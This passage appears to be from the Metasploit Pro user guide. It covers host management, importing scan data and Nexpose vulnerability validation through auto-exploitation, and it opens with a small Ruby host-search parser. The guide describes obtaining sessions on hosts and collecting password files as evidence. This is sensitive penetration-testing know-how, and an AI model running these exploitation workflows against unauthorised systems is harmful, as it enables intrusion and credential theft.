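  { hostname: 'dc01', os: 'Microsoft Windows', version: 'Windows 2008 R2 SP1', purpose: 'server',
    ip: '192.168.1.10', vulns: 3, services: 12, tags: %w[os_windows NexposeImport] },
  { hostname: 'ws07', os: 'Windows', version: 'Windows XP SP0', purpose: 'client',
    ip: '192.168.2.25', vulns: 0, services: 4, tags: %w[os_windows] },
  { hostname: 'web01', os: 'Linux', version: 'Ubuntu 12.04', purpose: 'server',
    ip: '192.168.2.40', vulns: 5, services: 6, tags: %w[os_linux NexposeImport] },
  { hostname: 'ws12', os: 'Windows', version: 'Windows 7 SP1', purpose: 'client',
    ip: '10.0.0.2', vulns: 1, services: 2, tags: [] }
].freeze

# Search filters the Hosts page exposes; vulns and services take numeric operators.
FILTERS = %i[hostname os version purpose ip vulns services].freeze
NUMERIC_FILTERS = %i[vulns services].freeze
NUMERIC_OPS = { ':' => :==, '=' => :==, '!:' => :!=, '<>' => :!=,
                '<' => :<, '<=' => :<=, '>' => :>, '>=' => :>= }.freeze

# Recursive-descent parser. parse_or takes its operands from parse_and, so AND
# binds tighter than OR; parentheses override that order. AST nodes:
# [:or, l, r], [:and, l, r], [:term, filter, op, keyword], [:tag, name],
# [:any, keyword] (a bare keyword is a basic search across all columns).
class QueryParser
  TERM = /\A(\w+)(!:|<>|<=|>=|[:=<>])(.+)\z/

  def initialize(query)
    # Tokens: parentheses, the && and || connectors (whitespace-separated), terms.
    @tokens = query.scan(/\(|\)|&&|\|\||[^\s()]+/)
  end

  def parse
    ast = parse_or
    raise ArgumentError, "unexpected token #{@tokens.first}" unless @tokens.empty?
    ast
  end

  private

  def parse_or
    left = parse_and
    while @tokens.first == '||'
      @tokens.shift
      left = [:or, left, parse_and]
    end
    left
  end

  def parse_and
    left = parse_atom
    while @tokens.first == '&&'
      @tokens.shift
      left = [:and, left, parse_atom]
    end
    left
  end

  def parse_atom
    tok = @tokens.shift
    raise ArgumentError, 'unexpected end of query' if tok.nil?
    raise ArgumentError, 'unexpected )' if tok == ')'
    if tok == '('
      inner = parse_or
      raise ArgumentError, 'missing )' unless @tokens.shift == ')'
      return inner
    end
    return [:tag, tok[1..-1]] if tok.start_with?('#')
    m = TERM.match(tok)
    m ? [:term, m[1].downcase.to_sym, m[2], m[3]] : [:any, tok]
  end
end

# Apply one filter/operator/keyword term to a host record.
def match_term?(host, filter, op, keyword)
  raise ArgumentError, "unknown search filter: #{filter}" unless FILTERS.include?(filter)
  # Numeric filters compare as integers; Integer() rejects a non-numeric keyword.
  return host[filter].public_send(NUMERIC_OPS[op], Integer(keyword)) if NUMERIC_FILTERS.include?(filter)
  v, k = host[filter].to_s.downcase, keyword.downcase
  case op
  when ':'  then v.include?(k)   # LIKE: keyword anywhere in the column
  when '!:' then !v.include?(k)  # NOT LIKE
  when '='  then v == k          # EQUALS: exact match only
  when '<>' then v != k          # NOT EQUALS
  else raise ArgumentError, "#{op} is only valid on numeric filters"
  end
end

def evaluate(ast, host)
  case ast[0]
  when :or   then evaluate(ast[1], host) || evaluate(ast[2], host)
  when :and  then evaluate(ast[1], host) && evaluate(ast[2], host)
  when :term then match_term?(host, ast[1], ast[2], ast[3])
  when :tag  then host[:tags].any? { |t| t.casecmp?(ast[1]) }
  when :any  then FILTERS.any? { |f| host[f].to_s.downcase.include?(ast[1].downcase) }
  end
end

# Run a query against the hosts table and return the matching hostnames.
def search(query, hosts = HOSTS)
  ast = QueryParser.new(query).parse
  hosts.select { |h| evaluate(ast, h) }.map { |h| h[:hostname] }
end
```

With this table, search('os:windows && 192.168.1 || 192.168.2') returns the Linux host web01 as well, while search('os:windows && (192.168.1 || 192.168.2)') does not, which is the difference the nested search example above describes.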

Adding a Host Manually


1. From within a project, click the Analysis tab.

2. When the Hosts window appears, click the New Host button.


3. Under the Name & Address area, enter a name for the host in the Name field and enter an IP address for the host in the IP address field.

4. If you have an Ethernet address for the host, enter it in the Ethernet address field.
5. Under the Operating System area, you can add the operating system information for the host. For example, if you want to add the operating system for the host, you can enter an OS like Windows XP in the OS Name field. This step is completely optional and is only recommended if you have the OS information for the host.

6. Select the Lock edited host attributes option if you do not want subsequent imports, discovery scans, or Nexpose scans to modify the host information. By default, this option is enabled.
7. If you want to add a service to the host, click the Add Service link. You will need to define the name, port, protocol, and state for the service.


8. When you are done, click the Save button.

Viewing Services for a Host


From within a project, select Analysis > Services from the Tasks menu.

Viewing Host Notes


A host note is a snippet of additional information about a host that Metasploit Pro was able to collect during a Discovery Scan. Typically, host notes contain data that does not fall into one of the categories tracked by the database, such as import and fingerprint information. For example, if the host was imported from a third party source, Metasploit displays this information on the Host Notes tab.

To view a host note:


From within a project, select Analysis > Notes from the Tasks menu.

Deleting a Host
1. From within a project, click the Analysis tab.
2. When the Hosts window appears, select the hosts that you want to delete.

3. Click the Delete button.

4. Click OK to confirm that you want to delete the host.


Viewing Captured Data


From within a project, select Analysis > Captured Data from the Tasks menu.

Viewing Vulnerabilities
From within a project, select Analysis > Vulnerabilities from the Tasks menu.

Viewing Tags
From within a project, click the Tags tab on the Tasks menu.

Importing Scan Data


Typically, if you use a vulnerability scanner, like Nexpose or Nessus, the scan reports will already include network information about the target systems. Therefore, if you have existing scan data for the target network, you can bypass the discovery scan step and import the scan data instead. When you import the scan data, Metasploit Pro pulls the operating system, services, and vulnerability information from the scan data and stores it in the project for you. Metasploit Pro supports most of the major scanners on the market, including Rapid7's own Nexpose, and other tools like Qualys and Core Impact. For a list of supported scanners, see Supported Scan Data Types.

1. From within a project, click the Overview tab.
2. Click the Import button.

3. When the Import Data page appears, click on the Browse button to open the File Upload window.


4. When the File Upload window appears, browse to the location of the file you want to import. Most import files will either be an XML or ZIP file. When you find the file that you want to upload, select it and click the Open button.

5. If you do not want to import the information for a specific host, you can enter the IP address for that host in the Exclude Addresses field. If you need to enter multiple hosts, use a comma to separate each address.
6. If you do not want the import to overwrite data for an existing host, select the Do not change existing hosts option.
7. Click the Import Data button.

Viewing Exploits for Known Vulnerabilities


From within a project, select Analysis > Vulnerabilities from the Tasks menu. The Vulnerabilities page appears and shows a list of all vulnerabilities found for each host. Next to each host, you will see the vulnerability name and the corresponding CVE. You can click on the vulnerability name or CVE ID to see more information about the security flaw.


Chapter 7: Validating Nexpose Vulnerabilities

Vulnerability validation is the process of identifying vulnerabilities that pose a real threat to an organization. To learn more about vulnerability validation, read the following topics:
- Getting Started with Vulnerability Validation on page 153
- Validating Nexpose Vulnerabilities with the Vulnerability Validation Wizard on page 157
- Tracking Real-Time Statistics and Events for Vulnerability Validation on page 180
- Nexpose Exceptions on page 187
- Validated Vulnerabilities on page 193


Getting Started with Vulnerability Validation


Vulnerability scanning plays a key role in the vulnerability management process. It helps you find potential vulnerabilities so that you can quantify and evaluate the threats that can adversely impact a network. While vulnerability scans can give you visibility into a network, they can yield a copious amount of data that requires an extensive amount of time and resources to assess and validate. With so many threats facing an organization, it can be difficult to prioritize and remediate security risks. Nexpose and Metasploit Pro seamlessly integrate to streamline the vulnerability validation workflow. Together they create a closed-loop security risk assessment solution so that you can find potential vulnerabilities, exploit them, and identify the security flaws that pose a real threat to a network.

Methods for Validating Vulnerabilities


In Metasploit Pro, there are a couple of ways that you can validate vulnerabilities found by Nexpose:
- Vulnerability Validation Wizard - This method is the easiest and should be used for bulk validations. It provides an all-in-one interface that walks you through importing and exploiting Nexpose vulnerabilities. It also helps you easily identify the vulnerabilities that are exploitable and non-exploitable so that you can send that data back to Nexpose.
- Manual Validation - This method requires much more legwork and should be used when you have specific vulnerabilities that you want to target. When you perform manual validation, you will need to set up a penetration test as you normally would. This includes creating a project, importing/scanning Nexpose sites, and exploiting specific vulnerabilities. After Metasploit Pro identifies the vulnerabilities that are exploitable and non-exploitable, you will be able to push that data back to Nexpose.

About the Vulnerability Validation Wizard


Metasploit Pro simplifies and streamlines the vulnerability validation process. It provides a guided interface, called the Vulnerability Validation Wizard, that walks you through each step of the vulnerability validation process, from importing Nexpose data to auto-exploiting vulnerabilities to sending the validation results back to Nexpose. You can even define exceptions for vulnerabilities that were not successfully exploited and generate a report that details the vulnerability testing results directly from Metasploit Pro. When you launch the Vulnerability Validation Wizard, you will need to configure the settings for the following tasks:
- Creating a project.
- Scanning or importing Nexpose sites.
- Tagging Nexpose assets. (optional)
- Auto-exploiting vulnerabilities.
- Generating a report. (optional)

Vulnerability Validation Wizard Workflow

Vulnerability Validation Terminology


Asset
The Nexpose term for a host or target.

Asset Groups
The Nexpose term for a group of hosts or targets.

Nexpose Push
The process of sending vulnerability exceptions or validated vulnerabilities back to Nexpose.

Site
The Nexpose term for a collection of assets.

Validated Vulnerability
A vulnerability found by Nexpose that Metasploit Pro was able to successfully exploit and obtain a session.

Vulnerability
A security flaw or weakness in an application or system that enables an attacker to compromise the target system.


Vulnerability Exception
A vulnerability found by Nexpose that Metasploit Pro was unable to exploit.

Vulnerability Exception Reason


The reason why a vulnerability exists and why it should be excluded from the vulnerability assessment.

Vulnerability Result Code


The reason why a module did not run successfully.

Vulnerability Validation
The process of identifying vulnerabilities that are exploitable.

Before You Begin
Before you can run the Vulnerability Validation Wizard, you will need to make sure that you have access to a Nexpose instance. You can only validate vulnerabilities with Metasploit Pro if you have Nexpose Enterprise or Nexpose Consultant version 5.7.16 or higher. Please check your Nexpose edition before attempting to use the Vulnerability Validation Wizard.

Adding a Nexpose Console


You can configure a Nexpose console directly from the Vulnerability Validation Wizard. However, to simplify the vulnerability validation workflow, it is recommended that you globally add the Nexpose Consoles you intend to use prior to launching the wizard. When you globally add a Nexpose Console, it will be accessible to all projects and all users.

To configure a Nexpose Console:


1. Select Administration > Global Settings from the Administration menu.

2. Find the Nexpose Consoles area.


3. Click the Configure a Nexpose Console button.

4. When the Configure a Nexpose Console page appears, enter the following information:
- Console Address - The IP address of the server that runs Nexpose. You can also specify the server name.
- Console Port - The port that runs the Nexpose service. The default port is 3780.
- Console Username - The Nexpose user name that will be used to log in to the console.
- Console Password - The Nexpose password that will be used to authenticate the user account.

5. Save the Nexpose Console.


Validating Nexpose Vulnerabilities with the Vulnerability Validation Wizard


The Vulnerability Validation Wizard provides a guided interface that walks you through pulling Nexpose vulnerability data into a project and exploiting it. There are a couple of ways that you can bring Nexpose vulnerability data into a project through the Vulnerability Validation Wizard:
l

- Importing Existing Sites - You can choose multiple sites from which you want to import hosts. Metasploit Pro pulls all of the hosts and their associated vulnerability information from the selected sites and stores their information in a project. Metasploit Pro only imports vulnerabilities for which it has matching exploit modules. For more information on how to import and exploit vulnerabilities with the Vulnerability Validation Wizard, see Importing and Exploiting Imported Nexpose Data on page 157.
- Running a Nexpose Scan - You can specify the hosts that you want to scan for vulnerabilities. Metasploit Pro creates a new site on Nexpose and adds the hosts to it. Nexpose scans the hosts for vulnerabilities. After the Nexpose scan completes, Metasploit Pro imports the vulnerabilities for which it has matching exploit modules. For more information on how to scan for vulnerabilities and exploit them with the Vulnerability Validation Wizard, see Scanning Nexpose Sites and Exploiting Identified Vulnerabilities on page 168.

Importing and Exploiting Imported Nexpose Data


1. Log in to the Metasploit Pro web interface.
2. When the Projects page appears, find the Quick Start Wizards and click on the Validate Vulnerabilities widget. The Validate Vulnerabilities Wizard opens and displays the Create Project page.


3. In the Project Name field, enter a name for the project. The project name can contain any combination of alphanumeric characters, special characters, and spaces. You can also provide a description for the project, which typically explains the purpose and scope of the test. This field is optional.

4. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.


5. Verify that the Import existing Nexpose vulnerability data option is selected.

6. Click the Choose a Nexpose Console dropdown and select the Nexpose Console from which you want to import sites. After you select a console, the wizard displays the list of sites that you can import.

Note: Metasploit Pro will import all the assets from a site unless you explicitly define the assets that you want to exclude. To exclude assets from the import, click the Excluded Addresses dropdown and enter the addresses of those assets in the Excluded Addresses field.

7. From the sites list, select the sites that you want to import into the project. You can use the select all checkbox to choose all of the listed sites, or you can select the sites individually.

Note: Metasploit Pro imports all assets from the site. For each asset, Metasploit Pro pulls and displays the IP address, operating system, MAC address, OS flavor, vulnerability name, and vulnerability references.


8. After you select the sites you want to import, click on the Tag tab and select the Tag option.

Note: Tags are a useful tool if you want to easily create Nexpose asset groups in Metasploit Pro. If you do not want to tag assets, go to Step 10.

9. Select the Automatically tag by OS option if you want to tag each host with its operating system.

Note: If this option is enabled, Windows hosts will be tagged with os_windows, and Linux hosts will be tagged with os_linux.


10. Select the Use custom tag option if you want to tag each host with a user-defined tag. If this option is enabled, the Vulnerability Validation Wizard displays the fields and options that you can use to define a custom tag.


11. After you configure the tagging options, click on the Exploit tab. The Auto-Exploitation page appears.

12. Click the Minimum Reliability dropdown and choose the module ranking you want to use. You should choose Great or Excellent.

13. Click the Generate Report tab if you want to include an auto-generated report at the end of the vulnerability validation test. If you do not want to include a report, deselect the Generate Report option and skip to the last step.

14. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the wizard uses an auto-generated report name.

15. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the preferred and default format.

16. Click the Type dropdown and select the report type you want to generate. You can choose the Audit report or the Compromised and Vulnerable Hosts report.

17. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.

18. Enter any hosts, or assets, whose information you do not want included in the report in the Excluded Addresses field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or standard CIDR notation.

19. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.

20. Click the Launch button. The Findings window appears and shows the statistics for the test.

Matching Metasploit Exploits to Nexpose Vulnerabilities


Metasploit Pro only matches vulnerabilities from Nexpose for which it has remote exploit modules. Nexpose, however, also counts local exploits, auxiliary modules, and browser exploits when it matches vulnerabilities to modules, so the number of exploit matches may differ from the number of vulnerabilities imported from Nexpose. Keep this in mind when you look at the Findings window: the number of imported vulnerabilities will differ from the number of exploit matches.

Scanning Nexpose Sites and Exploiting Identified Vulnerabilities


1. Log in to the Metasploit Pro web interface.

2. When the Projects page appears, find the Quick Start Wizards and click on the Validate Vulnerabilities widget. The Validate Vulnerabilities Wizard opens and displays the Create Project page.

3. In the Project Name field, enter a name for the project. The project name can contain any combination of alphanumeric characters, special characters, and spaces. You can also provide a description for the project, which typically explains the purpose and scope of the test. This field is optional.

4. Click on the Pull from Nexpose tab. The Nexpose Consoles page appears.

5. Select the Start a Nexpose Scan to get data option.

6. Click the Choose a Nexpose Console dropdown and select the Nexpose Console that you want to use to scan for vulnerabilities. The scan configuration page appears.

7. Enter the host addresses, or assets, that you want to scan in the Scan targets field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or standard CIDR notation.

8. Click the Scan template dropdown and select the template you want to use. Note: A scan template is a predefined set of scan options. There are a few default ones that you can choose from. For more information on each scan template, please see the Nexpose User's Guide.

9. Click the Tag tab. Note: If you do not want to tag assets, go to Step 13.

10. Select the Automatically tag by OS option if you want to tag each host with its operating system. Note: If enabled, hosts will be tagged with os_linux or os_windows.

11. Select the Use custom tag option if you want to tag each host with a user-defined tag. If this option is enabled, the Vulnerability Validation Wizard displays the fields and options that you can use to create a custom tag.

12. After you configure the tagging options, click on the Exploit tab. The Auto-Exploitation page appears.

13. Click the Minimum Reliability dropdown and choose the module ranking you want to use. You should use Great or Excellent.

14. Click the Generate Report tab if you want to include an auto-generated report at the end of the vulnerability validation test. If you do not want to include a report, deselect the Generate Report option and skip to the last step.

15. Enter a name for the report in the Report Name field, if you want to use a custom report name. Otherwise, the wizard uses an auto-generated report name.

16. Select whether you want to generate the report in PDF, RTF, or HTML. PDF is the preferred and default format.

17. Click the Type dropdown and select the report type you want to generate. You can choose the Audit report or the Compromised and Vulnerable Hosts report.

18. From the Sections area, deselect any sections you do not want to include in the report. Skip this step if you want to generate all the report sections.

19. Enter any hosts, or assets, whose information you do not want included in the report in the Excluded Addresses field. You can enter a single IP address, a comma separated list of IP addresses, an IP range described with hyphens, or standard CIDR notation.

20. Select the Email Report option if you want to e-mail the report after it generates. If you enable this option, you need to supply a comma separated list of e-mail addresses. Note: If you want to e-mail a report, you must set up a local mail server or e-mail relay service for Metasploit Pro to use. To define your mail server settings, select Administration > Global Settings > SMTP Settings.

21. Click the Launch button. The Findings window appears and shows the statistics for the test.

Tracking Real-Time Statistics and Events for Vulnerability Validation


The Findings window displays the real-time statistics for the test and the task log. You can click on the tabs at the top of the Findings window to switch between the real-time statistics and the task log. From the Findings window, you can also automatically push validated vulnerabilities and access the Vulnerabilities Exceptions configuration page.

Accessing the Findings Window


The Findings window automatically appears when you start the Vulnerability Validation Wizard. If you navigate away from the Findings window, you can go to the Tasks page to access it again.

To access the Findings Window:


1. From within a project, select Tasks > Show Tasks from the Project Tab bar. The Tasks page appears.

2. Find the Vulnerability Validation task.

3. Click the Vulnerability Validation task name. The Findings window appears.

The Statistics Tab


The Statistics tab shows a high-level count of hosts, vulnerabilities, and exploits. Each value is displayed in a stat bubble with an orange progress bar. The progress bar wraps around the stat bubble and only displays when there is activity occurring for a particular finding.

From the Statistics tab, you can track the following data:
- The total number of hosts that have been scanned or imported.

- The total number of unique vulnerabilities that have been identified.

- The total number of exploit modules that match Nexpose vulnerabilities.

- The total number of vulnerabilities that Metasploit Pro was able to exploit.

- The total number of vulnerabilities that Metasploit Pro was unable to exploit.

Viewing a List of Imported Hosts from the Findings Window


1. Open the Findings window.

2. Click on the Hosts Imported tab. The Hosts list appears and displays the IP addresses for each host that has been imported from a Nexpose site.

3. Use the navigational page buttons to view more hosts or click the Show Entries dropdown to expand the number of hosts displayed.

Viewing a List of Imported Vulnerabilities from the Findings Window


1. Open the Findings Window.

2. Click the Vulns Found tab. A list of imported vulnerabilities appears.

3. Use the navigational page buttons to view more vulnerabilities or click the Show Entries dropdown to expand the number of vulnerabilities displayed.

Viewing a List of Exploit Matches from the Findings Window


1. Open the Findings Window.

2. Click the Exploit Matches tab. A list of exploit matches appears.

3. Use the navigational page buttons to view more exploit modules or click the Show Entries dropdown to expand the number of exploit modules displayed.

Viewing a List of Validated Vulnerabilities from the Findings Window


1. Open the Findings Window.

2. Click the Vulns validations tab. A list of validated vulnerabilities appears.

You can view the vulnerability name, the exploit module that was run against the vulnerability, and the result of the exploit. For vulnerability validations, the state will be exploited.

3. Use the navigational page buttons to view more validations or click the Show Entries dropdown to expand the number of validations displayed.

Viewing a List of Vulnerability Exceptions from the Findings Window


1. Open the Findings Window.

2. Click the Vulns exceptions tab. A list of vulnerability exceptions appears.

You can view the vulnerability name, the exploit module that was run against the vulnerability, and the result of the exploit. For vulnerability exceptions, the state will be failed.

3. Use the navigational page buttons to view more exceptions or click the Show Entries dropdown to expand the number of exceptions displayed.

The Tasks Log Tab


The Tasks Log tab shows a detailed activity log for the Vulnerability Validation Wizard. Each task that Metasploit Pro performs is documented in the Tasks Log. For example, you can view the assets and vulnerability definitions as they are being imported into a project or you can view the exploit modules as they are being run. If you have chosen to perform a dry run of the auto-exploitation task, you can go to the Tasks Log to view the proposed attack plan. Additionally, the Tasks log shows you the current state of the test, the start time of the test, and the amount of time that the test has been running.

Nexpose Exceptions
An exception defines the reason why a vulnerability exists. You apply exceptions to vulnerabilities that are typically low-risk or are used deliberately to mitigate bigger threats. Vulnerability exceptions help you exclude certain vulnerabilities from a report so that you can manage your risk score. You can apply exceptions to vulnerabilities that Metasploit Pro was unable to exploit. These vulnerabilities have a status of Not Exploitable, which indicates that Metasploit Pro was unable to obtain a session on the target host due to some compensating control or back porting. Exceptions can be defined for vulnerabilities for the following reasons:

- They are used as compensating controls or to mitigate additional risks.

- They represent an acceptable use case or deliberate practice, such as anonymous FTP access.

- They represent an acceptable risk and may require more resources than you are willing to invest to remediate. These vulnerabilities typically pose a minimal risk.

- They are false positives.

The Exceptions Page


You create and push Nexpose exceptions from the Exceptions page. The Exceptions page is accessible from the Findings window or from the Vulnerabilities page. From the Exceptions page, you can define the exception settings for a group of hosts that have a specific vulnerability or you can define them individually for each host.

From the Exceptions page, you can perform the following tasks:

- View all the vulnerabilities that Metasploit Pro was unable to exploit.

- Assign the exception reason for each vulnerability.

- Assign expiration dates for vulnerability exceptions.

- Add comments to the vulnerability exception.

- Automatically approve vulnerability exception requests.

- Push exceptions back to Nexpose.

Accessing the Exceptions Page


1. From within a project, select Analysis > Vulnerabilities from the Project Tab bar. The Vulnerabilities page appears.

2. Click the Create Exception dropdown and select All Not Exploited. The Exceptions page appears. Note: The All Not Exploited option selects all vulnerabilities that have a Not Exploited status and displays them on the Exceptions page. If you only want to create exceptions for a few specific vulnerabilities, you can manually select them from the Vulnerabilities list and choose the All Selected option instead.

Creating and Pushing Nexpose Exceptions


1. From within a project, select Analysis > Vulnerabilities from the Project Tab bar. The Vulnerabilities page appears.

2. Click the Create Exception dropdown and select All Not Exploited. The Exceptions page appears. Note: The Create Exceptions button is available on the Findings window when there are vulnerabilities ready for you to create exceptions for; otherwise, it will be grayed out.

3. Click the Nexpose Console dropdown and select the console you want to push the exceptions to.

4. For each vulnerability, click the Reason dropdown and choose the vulnerability exception reason you want to assign to it. You can also provide additional information for the exception in the Comment field. For more information on exception reasons, see Vulnerability Exception Reasons on page 191. Note: If you want to define bulk exception settings for all hosts in a vulnerability group, select the All Hosts with this Vulnerability option. The Reason and Comment fields become available under the vulnerability name. The reason you select applies to all hosts in that vulnerability group.

5. Choose the All Expire option if you want to set an expiration date for the vulnerability exceptions. If you do not want to set an expiration date for any vulnerability exceptions, keep the default Never Expire option selected and go to Step 6.

6. To set the same expiration date for all vulnerability exceptions, select the All Expire option. A calendar appears. Find and select the date that you want to use. If you want to set a unique expiration date for each host, skip this step and go to the next step.

7. To set a unique expiration date for each host:

a. Select the All Expire option.

b. Click on the Expire field next to each host to display the calendar.

c. Find the expiration date that you want to use and select it.

8. Deselect the Automatically Approve option if you do not want to approve any of the vulnerability exception requests from Metasploit Pro. Instead, you will manually approve the exception requests through the Nexpose Console.

9. Select the hosts that you want to push exceptions for. Use the Select All Hosts checkbox if you want to push exceptions for all hosts.

10. When you are ready to push the exceptions, click the Push Exceptions button.

Vulnerability Exception Reasons


The following vulnerability exception reasons are available:
- False positive - Use this exception reason for a vulnerability that does not exist.

- Compensating control - Use this exception reason to indicate that a vulnerability is a compensating control, or a workaround for a security requirement.

- Acceptable use - Use this exception reason for any vulnerability that is used as part of organizational practices.

- Acceptable risk - Use this exception reason for any vulnerability that is considered low risk. These vulnerabilities tend to pose minimal security risk and are likely to consume more resources than they are worth.

- Other - Use this exception reason to define a custom exception. If you select Other, you can provide a custom exception reason in the Comment field.

Module Result Codes


A result code identifies the reason an exploit failed. You can view the result code for a vulnerability on the Vulnerability Exceptions page. The following result codes are available:

- None - Indicates that Metasploit Pro could not determine if the module ran successfully or failed.

- Unknown - Indicates that Metasploit Pro could not determine if the module ran successfully or failed.

- Unreachable - Indicates that Metasploit Pro could not reach the network service.

- Bad-config - Indicates that the exploit settings were configured incorrectly.

- Disconnected - Indicates that the network service disconnected during a module run.

- Not-found - Indicates that Metasploit Pro could not find the application or service.

- Unexpected-reply - Indicates that Metasploit Pro did not receive the expected response from the application.

- Timeout-expired - Indicates that a timeout occurred.

- User-interrupt - Indicates that the user stopped the module run.

- No-access - Indicates that Metasploit Pro could not access the application.

- No-target - Indicates that the module configuration was not compatible with the target.

- Not-vulnerable - Indicates that the application was not vulnerable.

- Payload-failed - Indicates that Metasploit Pro delivered a payload, but was unable to open a session.

Viewing Vulnerability Exceptions in Nexpose


After you push the exceptions, you can go to the Vulnerability Exception Listing (Administration > Exceptions and Overrides > Manage) in the Nexpose Console to view the exception requests that have been approved or are awaiting review. The Vulnerability Exception Listing shows the exceptions that are active across all sites. For more information on how to manage vulnerability exceptions, please see the Nexpose User's Guide.

Validated Vulnerabilities
A validated vulnerability is a vulnerability that Metasploit Pro was able to successfully exploit to obtain a session on a target host. Typically, the ability to gain a session on a target host provides enough evidence to show that a vulnerability poses a real security risk. However, you can use the session to collect additional evidence, such as screenshots, system files, and password files. If Metasploit Pro is able to successfully exploit a vulnerability, the exploit status for the host will be Exploited. All vulnerabilities with a status of Exploited can be sent back to Nexpose as validated vulnerabilities.

Pushing Validated Vulnerabilities Back to Nexpose


Sending validated vulnerabilities back to Nexpose is a simple one-button process. The Push Validations button is located on the Findings Window and the Vulnerabilities Page. You can use the button at either location to send validations back to a Nexpose console. You only need to perform the push once after a wizard run.

To push validated vulnerabilities back to Nexpose:


1. From within a project, select Analysis > Vulnerabilities from the Project Tab bar. The Vulnerabilities page appears.

2. Find the Push Exploited Vulnerabilities button. This button will be available if there are validations that need to be sent to Nexpose.

3. Click the Push Exploited Vulnerabilities button. The Task Log appears and shows you when the push is complete.

Viewing Validated Vulnerabilities in Nexpose


You can identify the vulnerabilities that have been validated by Metasploit from the individual asset page. Nexpose displays a Validated with Metasploit icon next to a validated vulnerability. This icon indicates that the vulnerability has been successfully exploited and requires remediation.

To view a list of validated vulnerabilities in the Nexpose Console:


1. From your Nexpose console, click the Assets tab.

2. Click the View assets by the sites they belong to link.

3. Scroll down to the Site Listing and find the site that you imported and tested in Metasploit Pro.

4. Open the site. The site page appears.

5. Scroll down to the Asset Listing and find the asset that has the validated vulnerability.

6. Click on the asset name. The asset page appears.

7. Find the Vulnerability Listing.

8. Click on the Exploited column to sort by validated vulnerabilities. Validated vulnerabilities will appear at the top of the column.

Searching for Validated Vulnerabilities in Nexpose


1. From the home page in your Nexpose Console, scroll down to the Asset Group Listing.

2. Click the New Dynamic Asset Group button. The Filtered Asset Search page appears.

3. Use the filters to create the following query: validated vulnerabilities are present.

4. Click the Search button. The search returns a list of assets that have validated vulnerabilities.

Chapter 8: Nexpose

To learn more about Nexpose, read the following topics:


- About Nexpose on page 198

- Nexpose Scan on page 200

- Import Nexpose Data on page 204

- Nexpose Asset Groups on page 212

About Nexpose
Vulnerability analysis is the process that detects, identifies, and assesses the vulnerabilities that exist within an organizational infrastructure. A vulnerability is a characteristic of an asset that an attacker can exploit to gain unauthorized access to sensitive data, inject malicious code, or generate a denial of service attack. To prevent security breaches, it is important to identify and remediate security holes and vulnerabilities that can expose an asset to an attack.

Generally, to perform vulnerability analysis, you perform the following steps:

1. Define and classify network or system resources.

2. Identify potential threats for each resource.

3. Prioritize the risks.

4. Develop a plan to remediate the vulnerabilities.

Nexpose automates the steps that you typically use to find and analyze vulnerabilities. Nexpose scans the assets to identify the active services, open ports, and applications that run on each machine. After the scan, Nexpose attempts to identify vulnerabilities that may exist based on the attributes of the known services and applications. Nexpose discloses the results in a scan report, which helps you to prioritize vulnerabilities based on risk factor and determine the most effective solution to implement.

Nexpose Terminology
The following are common Nexpose terms:

Site
A site is a logical group of assets that has a dedicated scan engine. A site is similar to a project. However, projects are more for intermittent spot tests, whereas sites can run over a long period of time and provide you with historical, trending data.

Asset
An asset is a host or target that Nexpose scans for vulnerabilities.

Asset Group
An asset group is a collection of assets. An asset group does not have a dedicated scan engine. Instead,

Scan Template
A scan template defines the audit level that Nexpose uses to perform a vulnerability scan.

Nexpose Integration with Metasploit


Nexpose integrates with Metasploit Pro to provide a complete vulnerability assessment and verification tool that helps you eliminate false positives, verify vulnerabilities, and validate remediation measures. There are a couple of ways that you can bring Nexpose data into Metasploit Pro. You can run a Nexpose scan directly from the Metasploit user interface or you can import Nexpose scan data into Metasploit Pro. When you import data from Nexpose into Metasploit Pro, Metasploit Pro automatically indexes the vulnerability data from Nexpose and uses the service and vulnerability reference ID to map each vulnerability to a matching exploit. The mapped exploits help you to easily launch attacks against the vulnerability and to quickly determine if the vulnerability is a real risk or a false positive. In addition to vulnerability scanning, Metasploit Pro provides a vulnerability exception management interface and the ability to create a Nexpose asset group.

Nexpose Scan
You can use the Community and Enterprise editions of Nexpose to scan assets for known vulnerabilities. After you run a Nexpose scan, you can import the scan data into Metasploit Pro to validate the results of the vulnerability scan. Metasploit Pro provides a connector that allows you to run a Nexpose scan and automatically import the scan results into a project. Before you can run a Nexpose scan, you must configure a Nexpose Console for Metasploit Pro to use. Metasploit Pro only supports the number of hosts that you have licenses for in Nexpose. If you provide more hosts than the number of licenses that you have available, the scan fails. For example, if you have a Community license, the maximum number of hosts Nexpose supports is 32. If you provide 35 hosts, the scan fails. You can download the Community edition of Nexpose from http://www.rapid7.com/vulnerabilityscanner.jsp. For more information on how to install and configure Nexpose, visit http://community.rapid7.com.

Before You Run a Nexpose Scan


Before you can run a Nexpose scan, you must configure a Nexpose Console for Metasploit Pro to use. Connections to the Nexpose Console act as persistent connections that you can use to import assets into a project. After you set up a Nexpose Console, you can access the console from any project to perform a Nexpose scan. Nexpose consoles are global components and are available to all projects.

Configuring a Nexpose Console


1. Choose Administration > Global Settings from the main menu.

2. Scroll down to the Nexpose Consoles area.

3. Click Configure a Nexpose Console.

4. In the Console Name field, enter a name for the console.

5. Enter the console address. For example, if Nexpose runs on the local system, you can use 127.0.0.1.

6. Enter the console port. By default, Nexpose runs on port 3780.

7. Enter the user name that you use to log in to the Nexpose Console.

8. Enter the password that you use to log in to the Nexpose Console.

9. Select the Enabled option to initialize and activate the Nexpose Console.

10. Save the configuration.

Import Nexpose Data


Metasploit Pro supports the import of Nexpose simple XML and Nexpose raw XML files. When Metasploit Pro imports data from a Nexpose report, it brings in the information that Nexpose found for each asset and displays it on the Hosts page. Metasploit Pro imports the following asset information:

- IP address

- Host name

- Operating system

- Services

- Known vulnerabilities

Importing Vulnerability Data from Nexpose


1. From within a project, click the Analysis tab.

2. When the Host window appears, click the Import button.

3. When the Import Data window appears, click Choose File to choose a file to import.

4. When the File Upload window appears, navigate to and choose a file to import.

5. Click Open after you select the file.

6. In the Exclude Address field, enter the target addresses that you want to leave out of the import.

